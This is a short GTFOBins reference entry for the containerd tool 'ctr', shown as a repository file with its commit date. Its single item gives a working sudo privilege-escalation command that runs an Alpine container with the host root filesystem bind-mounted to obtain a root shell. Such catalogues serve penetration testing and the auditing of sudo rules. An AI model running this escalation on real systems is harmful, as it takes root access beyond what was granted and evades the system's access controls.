GTFOBins.github.io/_gtfobins/ctr
2022-12-17 22:26:30 -04:00

9 lines
287 B
Plaintext

---
functions:
sudo:
- description: |
If ctr sudo permissions, you can use it to escape to a root shell. It is necessary to add an existing image.
- code: |
sudo /usr/bin/ctr run --mount type=bind,src=/,dst=/,options=rbind -t docker.io/library/alpine:latest bash
---